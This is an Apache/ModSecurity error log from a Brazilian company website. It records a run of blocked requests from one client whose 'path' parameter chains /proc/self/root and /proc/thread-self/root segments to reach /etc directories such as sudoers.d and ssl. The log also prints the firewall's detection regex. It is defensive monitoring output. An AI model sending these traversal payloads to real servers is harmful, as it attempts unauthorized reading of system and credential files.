[Thu Mar 19 07:23:57.822499 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:55622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOvcdf6f5d65gmYZRZdQAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:24:01.820046 2026] [:error] [pid 19093:tid 140411599251200] [client 74.7.243.128:44310] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOwV_V7PWP6ixUYl6h2AAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:24:05.752360 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:58972] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:24:11.198286 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:44314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvOygkwaGbbGflqUZCgDgAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:24:23.556790 2026] [mime_magic:error] [pid 17887:tid 140411590858496] (70014)End of file found: [client 74.7.241.31:44322] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/lib/systemd/user
[Thu Mar 19 07:24:33.753925 2026] [proxy_fcgi:error] [pid 27403:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:59606] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:24:52.310270 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:50658] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvO8_u8EFLIOrSqIpuHHAAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:25:12.149774 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:60580] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:25:15.255849 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:49214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvPC_u8EFLIOrSqIpuHKgAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:25:24.666693 2026] [:error] [pid 27293:tid 140411548894976] [client 74.7.243.128:43470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvPFP-YZRR_7pZ7nDJy_wAAA9c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:25:35.964828 2026] [mime_magic:error] [pid 17887:tid 140411733534464] (70014)End of file found: [client 57.141.18.18:36202] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:25:46.137881 2026] [proxy_fcgi:error] [pid 27403:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:33354] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:26:11.065854 2026] [proxy_fcgi:error] [pid 15826:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33934] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:26:20.880452 2026] [mime_magic:error] [pid 17887:tid 140411683178240] (70014)End of file found: [client 57.141.18.70:37638] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:26:37.737815 2026] [proxy_fcgi:error] [pid 15826:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:34676] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:26:40.096397 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.228.61:45854] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvPXuoXxyEfFpUF8f_1KQAAAVE"]
[Thu Mar 19 07:27:00.677888 2026] [proxy_fcgi:error] [pid 27293:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35244] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:27:09.898634 2026] [mime_magic:error] [pid 30077:tid 140411741927168] (70014)End of file found: [client 57.141.18.120:38190] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:27:23.130068 2026] [proxy_fcgi:error] [pid 17653:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:35996] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:27:45.125880 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:36574] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:28:09.149808 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37258] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:28:24.851158 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:58564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvPyOoXxyEfFpUF8f_1dwAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:28:34.069840 2026] [proxy_fcgi:error] [pid 17887:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:37910] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:28:35.150105 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:49122] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvP0-oXxyEfFpUF8f_1fwAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:29:01.129782 2026] [proxy_fcgi:error] [pid 14269:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:38694] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:29:25.153845 2026] [proxy_fcgi:error] [pid 17653:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:39532] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:29:41.897519 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:49124] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvQFQkwaGbbGflqUZCg7wAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:29:52.422214 2026] [proxy_fcgi:error] [pid 17887:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40166] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:30:21.646995 2026] [:error] [pid 27403:tid 140411674785536] [client 74.7.243.128:60666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvQPRkFeYa1D6dYQnDVwwAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:30:22.125801 2026] [proxy_fcgi:error] [pid 27403:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40984] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:30:40.085938 2026] [mime_magic:error] [pid 15826:tid 140411632822016] (70014)End of file found: [client 57.141.18.52:44226] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:30:51.673797 2026] [proxy_fcgi:error] [pid 27293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:41722] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:30:52.286707 2026] [:error] [pid 19093:tid 140411548894976] [client 74.7.243.128:43248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvQXF_V7PWP6ixUYl6jDQAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:31:23.126178 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42560] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:31:27.138071 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:59894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvQfwkwaGbbGflqUZChUQAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:32:00.452491 2026] [proxy_fcgi:error] [pid 19093:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:43676] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:32:27.125849 2026] [proxy_fcgi:error] [pid 17653:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44368] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:32:51.129816 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44964] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:33:14.137787 2026] [proxy_fcgi:error] [pid 30077:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:45472] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:33:38.135010 2026] [proxy_fcgi:error] [pid 19093:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:46130] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:33:56.218864 2026] [:error] [pid 27293:tid 140411641214720] [client 74.7.244.43:57404] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvRFP-YZRR_7pZ7nDJ0dQAAA8w"]
[Thu Mar 19 07:33:58.991838 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.243.128:36632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvRFv-YZRR_7pZ7nDJ0egAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:34:00.161788 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:46724] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:34:03.575144 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:53346] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvRG_u8EFLIOrSqIpuITwAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:34:07.330941 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:53350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvRH9a6ubjKNq_cu4Yw4QAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:34:09.141287 2026] [:error] [pid 27293:tid 140411590858496] [client 74.7.243.128:53358] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvRIf-YZRR_7pZ7nDJ0iAAAA9I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:34:09.142287 2026] [mime_magic:error] [pid 27293:tid 140411590858496] (70014)End of file found: [client 74.7.243.128:53358] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:34:23.149828 2026] [proxy_fcgi:error] [pid 17653:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:47340] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:34:50.069912 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47952] AH01075: Error dispatching request to : (polling)
